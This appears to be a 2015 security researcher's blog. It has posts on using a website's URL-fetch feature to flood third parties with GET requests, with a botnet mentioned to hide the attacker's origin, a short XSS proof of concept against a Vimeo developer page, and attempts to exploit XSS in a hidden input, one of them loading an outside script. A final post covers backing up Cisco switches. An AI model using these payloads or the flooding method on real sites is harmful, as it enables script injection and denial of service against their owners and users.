Tuesday, 27 January 2015

GET request Flooding, Websites as a proxy

This is a controversial vulnerability that some websites consider it as a valid one and others that don't bother much about it.

Many websites have an option to fetch images from an external URL, or post a comment with a link, resulting a real time loading of the title and description, these are the most common examples. In both of these examples a get request is made to the third party website, not from your pc but from the originating website.

What if we customize the get request and repeat it couple of hundred times?
Let's take the example below to demonstrate this scenario:

We first find an input that requests a URL from a third party website, and we modify the input to any get request we like.


When you press the import button the get request is going to be sent. We can then capture the data being transmitted in order to repeat this process.


Most of websites don't allow the same request being sent more than once, that's why we have to change the value on every request. We can achieve that with many different ways, in my case i created a small PHP CURL script that can do that for you.
We copy all the previously captured data and paste them in our script for the flooding process.

If the attacker has a botnet, he can generate this request multiple times from different locations targeting a single website, and the victim's website will log the IP addresses from the originating website, allowing the attacker to obfuscate their attack a step further by using a website as a proxy..


Tuesday, 13 January 2015

XSS on Vimeo

http://developer.vimeo.com had a flaw in one of their inputs.

Here is how it works:

They have an input where you can add a url and it will fetch an image from anywhere and display it as a logo for your app:


Apart from the XSS, they weren't filtering to accept only image links.

The poc XSS:

http://alex.avlonitis.me/images/face.png' onmouseover="onmouseover="alert(document.domain)"

The input break:



Saturday, 10 January 2015

Xss in hidden input. Possible?

While I was trying to find a way to exploit a vulnerable html hidden input on a famous website (the < > were sanitised). I have gathered some information trying many different techniques that might help on different website.
The vulnerable input looks something like this:

<input id='myInput' type='hidden' value='dynamic'/> 

It could break with a single quote ' onmousover="alert(1)" . And that would become:

<input id='myInput' type='hidden' value='dynamic' onmouseover="alert(1)" />

Unfortunately even if we break the input with onmouseover nothing happens because there is nothing visible in our page to hover. And neither all of the other attributes worked including onchange.

Can we overwrite the Type field by rewriting type="text"?
No that's not possible any more.

What if we style it inline with css and make it visible with the examples below:
style="display: block;width: 999px;height: 999px;"
style="display: inline;width: 999px;height: 999px;"
style="visibility: visible;"
None of that worked in this case as the CSS couldn't overwrite the html attribute.

Maybe try to fire up javascript within css:
style = width: expression(alert('xss'));"
style="-moz-binding:url('http://ha.ckers/xss.js');
No luck...

Haven't found a way to bypass this yet.

sources:
owasp.org
sla.ckers.org



Sunday, 4 January 2015

Automated Backup of Cisco switches

Created a small script to auto-backup cisco switches on the network using Perl, it connects to ssh and telnet configured switches.

Libraries you will need: Net:SSH2, Net::Telnet::Cisco